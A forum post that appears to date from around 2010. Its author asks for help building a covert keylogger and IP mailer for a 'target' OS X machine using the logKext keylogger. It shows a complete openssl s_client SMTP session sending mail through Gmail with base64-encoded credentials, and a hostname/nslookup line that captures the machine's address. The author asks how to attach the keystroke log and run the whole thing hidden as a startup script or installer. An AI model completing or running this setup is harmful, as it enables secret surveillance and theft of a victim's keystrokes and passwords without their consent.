Jump to content

Openssl + Logkext + Os X


casio

Recommended Posts

Hello Everybody.

Let me just say right off that I am not a mac person.

However, I am trying to program a keylog/IP mailer tied into OS X's kernel.

The logger installed on the target machine is:

code.google.com/p/logkext/

logKext is the best free open source key logger for OS X.

I've set the logKext file to unencrypted for now,

and I'm trying to attach the file in an email via openssl s_client.

under "334 VXNlcm5hbWU6" is your email "example@gmail.com" converted to base64

and under "334 UGFzc3dvcmQ6" is your password "examplePASSWORD" converted to base64

base64 encoder tool here: http://www.motobit.com/util/base64-decoder-encoder.asp

$ openssl s_client -crlf -connect smtp.gmail.com:465
CONNECTED(00000003)
depth=1 /C=US/O=Google Inc/CN=Google Internet Authority
verify error:num=20:unable to get local issuer certificate
verify return:0
---
Certificate chain
0 s:/C=US/ST=California/L=Mountain View/O=Google Inc/CN=smtp.gmail.com
   i:/C=US/O=Google Inc/CN=Google Internet Authority
1 s:/C=US/O=Google Inc/CN=Google Internet Authority
   i:/C=US/O=Equifax/OU=Equifax Secure Certificate Authority
---
Server certificate
-----BEGIN CERTIFICATE-----
MIIDWzCCAsSgAwIBAgIKFMs0nQADAAASjjANBgkqhkiG9w0BAQUFADBGMQswCQYD
VQQGEwJVUzETMBEGA1UEChMKR29vZ2xlIEluYzEiMCAGA1UEAxMZR29vZ2xlIElu
dGVybmV0IEF1dGhvcml0eTAeFw0xMDA0MjIyMDAyNDVaFw0xMTA0MjIyMDEyNDVa
MGgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRYwFAYDVQQHEw1N
b3VudGFpbiBWaWV3MRMwEQYDVQQKEwpHb29nbGUgSW5jMRcwFQYDVQQDEw5zbXRw
LmdtYWlsLmNvbTCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAz4B46NG2l4Bk
DdccddAuuOssQ4ZxCHoyj+ErdlEqZurVCoGQzAkhZTkzHrmIgYmM6roTbkF/zEaa
2ROe9s4VoL4OgUnoyB0u1KbwrG5PHBbsMdk0r6jMmhh+MORFVYgQrFxJnu8GnHiG
W4QhmKVytu0FclYE+F1gOOx5qIgTVCMCAwEAAaOCASwwggEoMB0GA1UdDgQWBBS1
+KKmwdxtkpKkJgvwhZztqe0uszAfBgNVHSMEGDAWgBS/wDDr9UMRPme6npH7/Gra
42sSJDBbBgNVHR8EVDBSMFCgTqBMhkpodHRwOi8vd3d3LmdzdGF0aWMuY29tL0dv
b2dsZUludGVybmV0QXV0aG9yaXR5L0dvb2dsZUludGVybmV0QXV0aG9yaXR5LmNy
bDBmBggrBgEFBQcBAQRaMFgwVgYIKwYBBQUHMAKGSmh0dHA6Ly93d3cuZ3N0YXRp
Yy5jb20vR29vZ2xlSW50ZXJuZXRBdXRob3JpdHkvR29vZ2xlSW50ZXJuZXRBdXRo
b3JpdHkuY3J0MCEGCSsGAQQBgjcUAgQUHhIAVwBlAGIAUwBlAHIAdgBlAHIwDQYJ
KoZIhvcNAQEFBQADgYEAUc39Y22ucA2N4mmDdPMC8DKbrRGlGMpC294mfh3yCkJa
YRWjodFQSgCtFyKhTZ9roFpSEL0D4QxAtLSwtC0bSaSVusfAW3/CFgG/Cya724ic
9UoEosoG8CK+eGoGQuEsZ0xR86J5jOs2H+4QPHFCn594V7ZySzdeQi93YV31RBE=
-----END CERTIFICATE-----
subject=/C=US/ST=California/L=Mountain View/O=Google Inc/CN=smtp.gmail.com
issuer=/C=US/O=Google Inc/CN=Google Internet Authority
---
No client certificate CA names sent
---
SSL handshake has read 1711 bytes and written 309 bytes
---
New, TLSv1/SSLv3, Cipher is RC4-MD5
Server public key is 1024 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
SSL-Session:
    Protocol  : TLSv1
    Cipher    : RC4-MD5
    Session-ID: 22C21C4D84A0D9649906F6EB8775B94F44504EA733C3DE62F752C5FB69412649
    Session-ID-ctx:
    Master-Key: 956F05DD954AB363CA629C57CA5B389829D0DF33D1FF5F6E19698AC4FEDF9DA02EE12E15D0835D1B
083CB88E20F7F66C
    Key-Arg   : None
    Start Time: 1277702327
    Timeout   : 300 (sec)
    Verify return code: 20 (unable to get local issuer certificate)
---
220 mx.google.com ESMTP h8sm4265622ibk.3
helo
250 mx.google.com at your service
auth login
334 VXNlcm5hbWU6
ZXhhbXBsZUBnbWFpbC5jb20=
334 UGFzc3dvcmQ6
ZXhhbXBsZVBBU1NXT1JE
235 2.7.0 Accepted
mail from:<example@gmail.com>
250 2.1.0 OK h8sm4265622ibk.3
rcpt to:<example@gmail.com>
250 2.1.5 OK h8sm4265622ibk.3
data
354  Go ahead h8sm4265622ibk.3
Subject: test

hello test

.
250 2.0.0 OK 1277702414 h8sm4265622ibk.3

The '.' -period- after the space sends the email.

Have not yet figured out how to add an attachment, which would include the unencrypted logKext file...

I am assuming it will have to be in MIME format or converted to base64?

Also thought it would be easy enough to add an IP mailer to this:

$ hostname | nslookup >> /whatEVERfolderYOUwant/test.txt

Any help at all with how to tie this all together as a startup script or in an installer app would be really helpful

Preferably this would be tied into the OS X architecture as a startup script or a running perl process or something and not an AppleScript

but really any help/suggestions/advice would be greatly appreciated

also, bear in mind what I am trying to accomplish here is assuming you have physical access to the machine

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...